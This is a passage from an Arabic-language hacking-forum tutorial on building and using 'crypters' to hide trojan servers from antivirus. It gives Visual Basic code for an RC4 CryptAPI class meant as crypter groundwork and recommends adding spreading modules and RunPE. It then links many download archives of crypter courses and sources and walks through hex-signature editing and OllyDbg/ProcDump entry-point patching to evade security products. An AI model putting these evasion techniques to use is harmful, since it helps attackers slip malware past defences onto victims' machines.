gfxxc = CallApiByName("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(dx2cx(0)), 256)
Thi***e = Left$(StrConv(dx2cx, vbUnicode), gfxxc)
End Function
________________________
نُضيف كلاس موديل :

'CryptAPI Encryption/Decryption Class
'------------------------------------
'
'Information concerning the CryptAPI
'encryption/decryption can probably
'be found somewhere on M$ homepage
'http://www.microsoft.com/
'
'(c) 2000, Fredrik Qvarfort
'

Option Explicit

Private m_Key As String

Private Declare Function CryptAcquireContext Lib "advapi32.dll" Alias "CryptAcquireContextA" (ByRef phProv As Long, ByVal pszContainer As String, ByVal pszProvider As String, ByVal dwProvType As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptCreateHash Lib "advapi32.dll" (ByVal hProv As Long, ByVal Algid As Long, ByVal hKey As Long, ByVal dwFlags As Long, ByRef phHash As Long) As Long
Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hHash As Long, ByVal pbData As String, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptDeriveKey Lib "advapi32.dll" (ByVal hProv As Long, ByVal Algid As Long, ByVal hBaseData As Long, ByVal dwFlags As Long, ByRef phKey As Long) As Long
Private Declare Function CryptDestroyHash Lib "advapi32.dll" (ByVal hHash As Long) As Long
Private Declare Function CryptEncrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, ByRef pdwDataLen As Long, ByVal dwBufLen As Long) As Long
Private Declare Function CryptDestroyKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function CryptReleaseContext Lib "advapi32.dll" (ByVal hProv As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptDecrypt Lib "advapi32.dll" (ByVal hKey As Long, ByVal hHash As Long, ByVal Final As Long, ByVal dwFlags As Long, ByVal pbData As String, ByRef pdwDataLen As Long) As Long

Private Const SERVICE_PROVIDER As String = "Microsoft Base Cryptographic Provider v1.0"
Private Const KEY_CONTAINER As String = "****************llica"
Private Const PROV_RSA_FULL As Long = 1
Private Const CRYPT_NEWKEYSET As Long = 8
Private Const ALG_CLASS_DATA_ENCRYPT As Long = 24576
Private Const ALG_CLASS_HASH As Long = 32768
Private Const ALG_TYPE_ANY As Long = 0
Private Const ALG_TYPE_STREAM As Long = 2048
Private Const ALG_SID_RC4 As Long = 1
Private Const ALG_SID_MD5 As Long = 3
Private Const CALG_MD5 As Long = ((ALG_CLASS_HASH Or ALG_TYPE_ANY) Or ALG_SID_MD5)
Private Const CALG_RC4 As Long = ((ALG_CLASS_DATA_ENCRYPT Or ALG_TYPE_STREAM) Or ALG_SID_RC4)
Private Const ENCRYPT_ALGORITHM As Long = CALG_RC4
Public Sub EncryptByte(ByteArray() As Byte, Optional Password As String)

'Convert the array into a string, encrypt it
'and then convert it back to an array
ByteArray() = StrConv(EncryptString(StrConv(ByteArray(), vbUnicode), Password), vbFromUnicode)

End Sub

Public Function EncryptString(Text As String, Optional Password As String) As String

'Set the new key if any was sent to the function
If (Len(Password) > 0) Then Key = Password

'Return the encrypted data
EncryptString = EncryptDecrypt(Text, True)

End Function

Public Sub DecryptByte(ByteArray() As Byte, Optional Password As String)

'Convert the array into a string, decrypt it
'and then convert it back to an array
ByteArray() = StrConv(DecryptString(StrConv(ByteArray(), vbUnicode), Password), vbFromUnicode)

End Sub


Public Function DecryptString(Text As String, Optional Password As String) As String

'Set the new key if any was sent to the function
If (Len(Password) > 0) Then Key = Password

'Return the decrypted data
DecryptString = EncryptDecrypt(Text, False)

End Function
Public Sub EncryptFile(SourceFile As String, DestFile As String, Optional Key As String)

Dim Filenr As Integer
Dim ByteArray() As Byte

'Make sure the source file do exist
If (Not (SourceFile)) Then
Call Err.Raise(vbObjectError, , "Error in Skipjack EncryptFile procedure (Source file does not exist).")
Exit Sub
End If

'Open the source file and read the content
'into a bytearray to pass onto encryption
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr

'Encrypt the bytearray
Call EncryptByte(ByteArray(), Key)

'If the destination file already exist we need
'to delete it since opening it for binary use
'will preserve it if it already exist
If ((DestFile)) Then Kill DestFile

'Store the encrypted data in the destination file
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr

End Sub


Public Sub DecryptFile(SourceFile As String, DestFile As String, Optional Key As String)

Dim Filenr As Integer
Dim ByteArray() As Byte

'Make sure the source file do exist
If (Not (SourceFile)) Then
Call Err.Raise(vbObjectError, , "Error in Skipjack EncryptFile procedure (Source file does not exist).")
Exit Sub
End If

'Open the source file and read the content
'into a bytearray to decrypt
Filenr = FreeFile
Open SourceFile For Binary As #Filenr
ReDim ByteArray(0 To LOF(Filenr) - 1)
Get #Filenr, , ByteArray()
Close #Filenr

'Decrypt the bytearray
Call DecryptByte(ByteArray(), Key)

'If the destination file already exist we need
'to delete it since opening it for binary use
'will preserve it if it already exist
If ((DestFile)) Then Kill DestFile

'Store the decrypted data in the destination file
Filenr = FreeFile
Open DestFile For Binary As #Filenr
Put #Filenr, , ByteArray()
Close #Filenr

End Sub

Private Function EncryptDecrypt(ByVal Text As String, Encrypt As Boolean) As String

Dim hKey As Long
Dim hHash As Long
Dim lLength As Long
Dim hCryptProv As Long

'Get handle to CSP
If (CryptAcquireContext(hCryptProv, KEY_CONTAINER, SERVICE_PROVIDER, PROV_RSA_FULL, CRYPT_NEWKEYSET) = 0) Then
If (CryptAcquireContext(hCryptProv, KEY_CONTAINER, SERVICE_PROVIDER, PROV_RSA_FULL, 0) = 0) Then
Call Err.Raise(vbObjectError, , "Error during CryptAcquireContext for a new key container." & vbCrLf & "A container with this name probably already exists.")
End If
End If

'Create a hash object to calculate a session
'key from the password (instead of encrypting
'with the actual key)
If (CryptCreateHash(hCryptProv, CALG_MD5, 0, 0, hHash) = 0) Then
Call Err.Raise(vbObjectError, , "Could not create a Hash Object (CryptCreateHash API)")
End If

'Hash the password
If (CryptHashData(hHash, m_Key, Len(m_Key), 0) = 0) Then
Call Err.Raise(vbObjectError, , "Could not calculate a Hash Value (CryptHashData API)")
End If

'Derive a session key from the hash object
If (CryptDeriveKey(hCryptProv, ENCRYPT_ALGORITHM, hHash, 0, hKey) = 0) Then
Call Err.Raise(vbObjectError, , "Could not create a session key (CryptDeriveKey API)")
End If

'Encrypt or decrypt depending on the Encrypt parameter
lLength = Len(Text)
If (Encrypt) Then
If (CryptEncrypt(hKey, 0, 1, 0, Text, lLength, lLength) = 0) Then
Call Err.Raise(vbObjectError, , "Error during CryptEncrypt.")
End If
Else
If (CryptDecrypt(hKey, 0, 1, 0, Text, lLength) = 0) Then
'Call Err.Raise(vbObjectError, , "Error during CryptDecrypt.")
End If
End If

'Return the encrypted/decrypted data
EncryptDecrypt = Left$(Text, lLength)

'Destroy the session key
If (hKey <> 0) Then Call CryptDestroyKey(hKey)

'Destroy the hash object
If (hHash <> 0) Then Call CryptDestroyHash(hHash)

'Release provider handle
If (hCryptProv <> 0) Then Call CryptReleaseContext(hCryptProv, 0)

End Function
Public Property Let Key(New_Value As String)

'Do nothing if no change was made
If (m_Key = New_Value) Then Exit Property

'Set the new key
m_Key = New_Value

End Property
__________
وَفي النهاية :

وبهذه الخطوة يكون قد أصبح لديك برنامج تشفير
ولكنك استفدت بأنك فهمت الأكواد هذه المرة , وبإمكانك إضافة المزيد
من موديلات الانتشار + كود [ RunPE ]
___________________________
الان اقدم لكم اسطوانه وهي لتشفير الستب وبرنامج التشفير:-
صوره


وتحتوي على دروس

1. آلتشفير بـ aCo
2. آلتشفير بـ UnDeTeCTor
3. التشفير بـ Bl0d CoDe
4. التشفير بـ SiMPlE
5. ألتشفير بـ RPG
6. التشفير بـ UniQuE
7. آلتشفير بـ PrInGleS
8. آلتشفير بـ تغير الاكواد
9. آلتشفير بـ KPc
10. موقع فحص الستب ما يرسل قيم ( قم بوضع علامة الصح )
11. سورسات برامج تشفير لـ التطبيق ( المقصد بها تسهيل العملية بدلا عن البحث )

التحميل من هنا
http://www.mediafire.com/?tcq5n8ppl44c2o7
اداة مساعده في تشغيل الاسطوانه
http://www.mediafire.com/?x6th2t4r2tk71ru

طبعا مشكووور الاخ (جنان هكر على هده الدروه)

_______________________________________
الان النوع الثاني من التشفير وهو التشفير" وقت التشغيل"= runtime
وهذه الطريقة ليست عشوائية بل لها قواعد وضوابط
وهي تعمل على تشفير السيرفر وقت الفحص و وقت تشغيله مع الذاكره مباشره
وهي على انواع كتيره سنتناول منها التشفير بالهكس وورك شوب وباداة الاولي
اولا:-التشفير ببرنامج(hexworkshop
hex:-
التشفير بالهيكس

هي عملية تضليل للانتي فيرس فكما هو معروف ان عملية كشف الانتي فيرس للفيروس تكون عن طريق قراءة برنامج الحماية لاكواد الملف ومن ثم مقارنتها بالدتا بيز الخاصة ببرنامج الحماية وحينما يتم مطابقة توقيع الداتا بيز مع الملف المفحوص يتعرف الانتي فيرس ع الملف علي انه فيروس .. وعملية التشفير هي تغير بسيط في توقيع الملف حتي تتمكن من تضليل الانتي فيرس ومن ثم لا يقوم بأكتشاف الفيروس او السيرفر .

السيرفر عبارة عن ملف تنفيذي , وعند تصفحة بالهيكس يصبح في شكل قيم (حروف وارقام) بالنظام السداسي عشري , فتقوم بالبحث عن القيمة او الرمز الذي يسبب اكتشاف الانتي فيروس للملف ومن ثم تقوم بتغيرة مع التأكد من فعالية الملف .
عن طريق التبليغ الداخلي
ولاحتراف التشفير بالهكس هناك طريق واحد فقط وهو اتباع هه الاسطوانات على التوالي للاخ فارس وهو منتج هه الاسطوانات التي لم يوجد مثيل لها في الوطن العربي وهي متبوعه بالصورت والصوره:-
الاسطوانة الاولى

التحميل
http://www.mediafire.com/?tzmazyktwjm
http://www.mediafire.com/?knz4cxttoy0
http://www.mediafire.com/?qy4gcnnkddd
http://www.mediafire.com/?mgjmkizrjho
http://www.mediafire.com/?mifywnmtnzwhttp://www.mediafire.com/?yqmmfkdzkmi
http://www.mediafire.com/?nlbdmzwjdgz
http://www.mediafire.com/?dzkryqeemmd
الاسطوانه الثانيه
صوره

التحميل:-
http://www.mediafire.com/?n32j88yc57vdbgb
http://www.mediafire.com/?t6fa9ntw5dfmd6phttp://www.mediafire.com/?uohhm46sdh7ohn6
http://www.mediafire.com/?6x751obbq47aoo7
http://www.mediafire.com/?waq96rkzsk8llbu
http://www.mediafire.com/?hewap1j8ggkd6gl
http://www.mediafire.com/?yytkkll7y5imx14
http://www.mediafire.com/?ootw29zs8vtsv8b
http://www.mediafire.com/?dsko0ssw3m43p7g
http://www.mediafire.com/?1uuqfq41gv3x2uu
http://www.mediafire.com/?77d37anfsinwavg
الاسطونه الثالثه
صوره


http://www.mediafire.com/?9bvg8f5gegcsw65#1
http://www.mediafire.com/?5f63zxttphsf3t1
http://www.mediafire.com/?d418jlxbtqlysa6#1
http://www.mediafire.com/?yta8sozc8dqsub9#1
http://www.mediafire.com/?xyc41y4deamh4yh#1
http://www.mediafire.com/?jt96fl79dtrt7l8#1
http://www.mediafire.com/?zbn4af0a47cff40#1
http://www.mediafire.com/?h0i99miuzgy6c5h#1
http://www.mediafire.com/?0cyqtjp1dze420p#1
http://www.mediafire.com/?siih4ip78rq76o1#1
http://www.mediafire.com/?ra2outqr93qa2mu#1
الاسطوانه الرابعه

http://www.mediafire.com/?xygvdt3l6q5tlx8
http://www.mediafire.com/?2d172ar3y1cvd57
http://www.mediafire.com/?c11cv49x57zixs5#1
http://www.mediafire.com/?q8wlc8e8ik5hw5f#1
http://www.mediafire.com/?fywoau2w6vfzv2d#1
http://www.mediafire.com/?za4gs22d1tv2cqc#1
http://www.mediafire.com/?1vbmhg3f963u2nh#1
http://www.mediafire.com/?sx8me8e54irwpa5#1
http://www.mediafire.com/?v18q8cr93ywfal7#1
http://www.mediafire.com/?cf4obi6vsc9552m#1
http://www.mediafire.com/?7q78lcx5qc9wba5#1
نبدأ بالاولى:-
له طرق كتيره لاكن انا وقتي ما يسمحلي انا اكمل شرح للتشفير بالاولي فجلبت ا الشرح من العضو
bl@str
جزاه الله كل خير نبدأ على بركة الله:-
اولا :-الادوات المطلوبه
برنامج olly
وذا رابط التحميل
http://www.mediafire.com/?sqwmms3218hfsho
برنامجprocdump
المنقح وقد ارفقته في الدوره
نبدأ بالطريقة الاولى
اولا التشفير بأضافة الاكواد
شرح العضو
bl@str
نفتح السيرفر بالبرنامج

بعد ذالك

ننسخ نقطة الادخال الاصليه بالطريقه التاليه


بعد ذالك

ننزل الى مكان فاضي علشان نضيف الاكواد كما في الصوره


بعد ذالك

نشوف هنا كيف نضهر المربع الي اح نحط الاكواد فيه



بعد ذالك

الان نضيف الاكواد



بعد ذالك

الحين بعد ما اضفنا الاكواد نبي ننسخ نقطة الادخال الجديده بالطريقه التاليه




بعد ذالك

الحين نشوف كيف نضلل كل الاكواد الي اضناها علشان ننسخها بالطريقه التاليه


http://up.arab-x.com/Mar10/jAS24695.gif

بعد ذالك

ننسخ الكل بعد ماضللنا بالطريقه التاليه



بعد ذالك

الحين نحفظ السيرفر بالطريقه التاليه



بعد ذالك

نفتح السيرفر الي حفظناها ببرنامج Procdump علشان نعدل عليه ونضيف نقطة الادخال الجديده الي حفظناها بالصوره السابعه

بالطريقه التاليه




الان نشوف كيف نعدل على نقطة الادخال تابعو





اوكي الحين نسوي اوكي

بعد كذا نطلع من البرنامج وبكذا انتهينا

الطريقه هذي تشفر لك على حسب قوة الكود وانا حاط لكم فوق 20 كود قويه وان شاء الله تفيدكم

انتهى


ثانيا التشفير ببرنامج olly لكن بطريقه اخرى تابعوا الشرح

البرامج المستخدمه نفس البرامج الي فوق بالضبط


اولا نفتح السيرفر ببرنامج olly

راح يقولنا نعم او لا نختار نعم

بعد كذا نضغط على كلمة pushad مرتين الى ما اتفتح لنا نافذه مثل الي بالصوره وننسخ الي داخلها وانلصقها بمفكره


الان نجي للي تحتها ونضغط كمان مرتين وننسخ الي داخلها



الان نضلل الي نسخناهم ونسوي كذا


الان راح تطلع لنا كلمات اسمها nop نروح لاخر وحده منهم وننسخ قيمتها ونلصقها بالمفكر بالطريقه التاليه




ننزل الى تحت وندور مكان فاضي علشان نلصق القيم الي نسخناها من فوق مثل الي بالصوره نضغط مرتين على مكان فاضي ونسوي لصق



ونلصق على الي تحتها بالضبط مثل ماسوينا بالي فوق




الان تمام

الان تمام
الان تمام


نروح للي نسخناها من كلمة jmpفوق ونسسخ الارقام ونلصقها بس قبل لانلصقها نكتب قبلها nop ونحط القيمه مثل الي بالصوره

اوكي الحين نسوي ياضافه وبعدين نطلع من مربع الاضافه نجي لاول وحده من الثلاث الي اضناهم ونسوي نسخ وكلك يمين ونختار الثانيه الي هي كوبي وبعدين to clipboard

ونروح نلصقها بالمفكره

وبعدين نضلهم كلهم علشان نحفظ بالطريقه التاليه


اوكي الحين بعد مانسخناها نسوي كوبي ال بالطريقه التاليه " ماعليش الصوره اخذتها من الي فوق لاني ضيعت بالروابط


اوكي الحين شوفوا كيف نحفظهم " حتى هذي الصوره سحبتها من فوق "


اوكي الحين بعد ماحفنا السيرفر نروح نعدل على نقطة الادخال ببرنامج proc dump

بالطريقه التاليه

الحين نروح نعدل على نقطة الادخال طبعا نبدل الاربع الارقام الموجود باخر اربع ارقام من نقاط الادخال الي نسخناهم من فوق
مثل كذا


اوكي الحين نسوي ياوكي وبعد كذا نسوي خروج

وكذا تم التشفير طبع الطريقه هذي تدعس تقريا من 4 الى 6 حمايات


انتهى


الطريقه الثالثه

برضوا عن طريق العم olly الطريقه الثالثه

وهي عن طريق تغير مكان نقطة الادخال سهل جدا


نفتح السيرفر عن طريق برنامج ooly

بعد كذا ننسخ نقطة الادخال بالطريقه التاليه

اوكي الحين ننزل لمكان فاضي كالعاده زنظغط على واحد منهم مرتين ونضيف نقطة الادخال

اوكي الحين بعد ما اضفنا نقطة الادخال ننسخ نقطة الادخال بالطريق التاليه

اوكي الحين نسوي نسخ الكل علشان نسوي سيف >> سيف والا سكين قصدي seave
http://up.arab-x.com/Mar10/JnW22813.gif

الحين نسوي save

الحين تمام نحفظ السيرفر


الحين نقفل البرنامج علشان نروح برنامج proc dump

الحين نفتح السيرفر ونعدل عليه بالطريقه التاليه
http://up.arab-x.com/Mar10/YFI24695.gif
بعد ذالك نبدل اخر اربع ارقام باخر اربع ارقام من القيمه الي نسخناها من فوق الصوره توضح
http://up.arab-x.com/Mar10/TMC22901.gif
اوكي يارجاله تم التشفير والدعس طبعا الطريقه هذي تدعس حمايتين الى ثلاث
save
انتهى
ولحد هون مننهي دروتنا .. نتمنا من الجميع المشاركه والتفاعل مع الموضوع
اثبت وجودك برد يكفي+لاتنسونا من دعواتكم+التقييم اهم شي
اتمنى اشوف ردود معنويه مشان تشوفوا القادم افضل بعون الله تعالى
والســــــــلام خير الختام